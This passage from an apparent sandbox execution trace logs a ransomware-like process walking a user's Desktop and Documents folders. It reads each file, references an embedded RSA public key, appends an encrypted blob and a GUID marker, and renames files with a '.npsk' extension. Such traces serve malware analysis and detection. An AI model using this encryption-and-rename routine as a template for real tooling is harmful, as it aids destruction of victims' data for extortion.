dwReserved1=0x0, cFileName="zjYvg.wav", cAlternateFileName="")) returned 1 [0215.119] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zjYvg.wav") returned=".wav" [0215.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zjYvg.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zjyvg.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.120] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=70689) returned 1 [0215.120] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.127] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x113fb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.127] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.129] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x11421, lpOverlapped=0x0) returned 1 [0215.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.131] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.132] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.132] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.132] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.132] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.132] GetLastError () returned 0x0 [0215.132] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.133] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.133] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.133] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.133] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.133] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.133] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.133] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.134] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x11421, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.134] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.134] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.134] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.134] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.135] CloseHandle (hObject=0x61c) returned 1 [0215.137] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zjYvg.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zjyvg.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zjYvg.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zjyvg.wav.npsk")) returned 1 [0215.138] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.138] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.138] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.140] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0215.140] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17fbe700, ftCreationTime.dwHighDateTime=0x1d5ddc8, ftLastAccessTime.dwLowDateTime=0x7e51cad0, ftLastAccessTime.dwHighDateTime=0x1d5e46f, ftLastWriteTime.dwLowDateTime=0x7e51cad0, ftLastWriteTime.dwHighDateTime=0x1d5e46f, nFileSizeHigh=0x0, nFileSizeLow=0xee66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_fcNT.wav", cAlternateFileName="")) returned 1 [0215.140] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_fcNT.wav") returned=".wav" [0215.140] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_fcNT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_fcnt.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.140] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=61030) returned 1 [0215.140] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.143] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xee40, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.143] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.145] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0xee66, lpOverlapped=0x0) returned 1 [0215.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.146] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.146] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.147] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.147] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.147] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.147] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.147] GetLastError () returned 0x0 [0215.147] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.147] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.147] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.147] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.147] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.147] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.147] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.148] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.149] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0xee66, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.149] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.149] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.149] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.149] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.149] CloseHandle (hObject=0x61c) returned 1 [0215.151] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_fcNT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_fcnt.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_fcNT.wav.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_fcnt.wav.npsk")) returned 1 [0215.152] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.152] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.152] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.154] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7bce58 | out: hHeap=0x750000) returned 1 [0215.154] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17fbe700, ftCreationTime.dwHighDateTime=0x1d5ddc8, ftLastAccessTime.dwLowDateTime=0x7e51cad0, ftLastAccessTime.dwHighDateTime=0x1d5e46f, ftLastWriteTime.dwLowDateTime=0x7e51cad0, ftLastWriteTime.dwHighDateTime=0x1d5e46f, nFileSizeHigh=0x0, nFileSizeLow=0xee66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_fcNT.wav", cAlternateFileName="")) returned 0 [0215.154] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0215.154] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7c0000 | out: hHeap=0x750000) returned 1 [0215.154] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3240d78 | out: hHeap=0x750000) returned 1 [0215.154] PeekMessageW (in: lpMsg=0x397ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397ff08) returned 0 [0215.154] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0215.154] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0215.154] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0215.154] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0215.154] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286288 | out: hHeap=0x750000) returned 1 [0215.154] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0215.154] PathFindFileNameW (pszPath="") returned="" [0215.154] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd99ba3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd99ba3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0215.155] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a88280 | out: hHeap=0x750000) returned 1 [0215.155] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd99ba3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd99ba3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0215.155] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53aee3a0, ftCreationTime.dwHighDateTime=0x1d5d135, ftLastAccessTime.dwLowDateTime=0xbf5b4690, ftLastAccessTime.dwHighDateTime=0x1d59722, ftLastWriteTime.dwLowDateTime=0xbf5b4690, ftLastWriteTime.dwHighDateTime=0x1d59722, nFileSizeHigh=0x0, nFileSizeLow=0x11e20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0vuZeH8JbX.docx", cAlternateFileName="0VUZEH~1.DOC")) returned 1 [0215.155] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0vuZeH8JbX.docx") returned=".docx" [0215.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0vuZeH8JbX.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0vuzeh8jbx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0215.157] GetFileSizeEx (in: hFile=0x61c, lpFileSize=0x397fb40 | out: lpFileSize=0x397fb40*=73248) returned 1 [0215.157] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3810000 [0215.159] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x11dfa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.159] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x397fb78, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb78*=0x26, lpOverlapped=0x0) returned 1 [0215.161] ReadFile (in: hFile=0x61c, lpBuffer=0x3810000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x397fb70, lpOverlapped=0x0 | out: lpBuffer=0x3810000*, lpNumberOfBytesRead=0x397fb70*=0x11e20, lpOverlapped=0x0) returned 1 [0215.162] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.162] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.162] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0215.162] CryptAcquireContextW (in: phProv=0x397fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x397fa50*=0x7b1d70) returned 1 [0215.163] CryptCreateHash (in: hProv=0x7b1d70, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x397fa58 | out: phHash=0x397fa58) returned 1 [0215.163] CryptHashData (hHash=0x3277d68, pbData=0x7a79b8, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0215.163] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x0, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x397fa54) returned 1 [0215.163] CryptGetHashParam (in: hHash=0x3277d68, dwParam=0x2, pbData=0x32728a8, pdwDataLen=0x397fa54, dwFlags=0x0 | out: pbData=0x32728a8, pdwDataLen=0x397fa54) returned 1 [0215.163] GetLastError () returned 0x0 [0215.163] CryptDestroyHash (hHash=0x3277d68) returned 1 [0215.163] CryptReleaseContext (hProv=0x7b1d70, dwFlags=0x0) returned 1 [0215.163] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x7a79b8 | out: hHeap=0x750000) returned 1 [0215.163] UuidCreate (in: Uuid=0x397fa48 | out: Uuid=0x397fa48) returned 0x0 [0215.163] UuidToStringA (in: Uuid=0x397fa48, StringUuid=0x397fa40 | out: StringUuid=0x397fa40) returned 0x0 [0215.163] RpcStringFreeA (in: String=0x397fa40 | out: String=0x397fa40) returned 0x0 [0215.163] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.164] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x3a92af8, Size=0x218) returned 0x3a8afa0 [0215.164] SetFilePointerEx (in: hFile=0x61c, liDistanceToMove=0x11e20, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.164] WriteFile (in: hFile=0x61c, lpBuffer=0x3217e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x3217e98*, lpNumberOfBytesWritten=0x397fb50*=0x100, lpOverlapped=0x0) returned 1 [0215.165] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3217e98 | out: hHeap=0x750000) returned 1 [0215.165] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0215.165] WriteFile (in: hFile=0x61c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x397fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x397fb50*=0x26, lpOverlapped=0x0) returned 1 [0215.165] CloseHandle (hObject=0x61c) returned 1 [0215.167] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0vuZeH8JbX.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0vuzeh8jbx.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0vuZeH8JbX.docx.npsk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0vuzeh8jbx.docx.npsk")) returned 1 [0215.169] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a91f88 | out: hHeap=0x750000) returned 1 [0215.169] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x323db00 | out: hHeap=0x750000) returned 1 [0215.169] VirtualFree (lpAddress=0x3810000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0215.171] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x77e7d8 | out: hHeap=0x750000) returned 1 [0215.171] FindNextFileW (in: 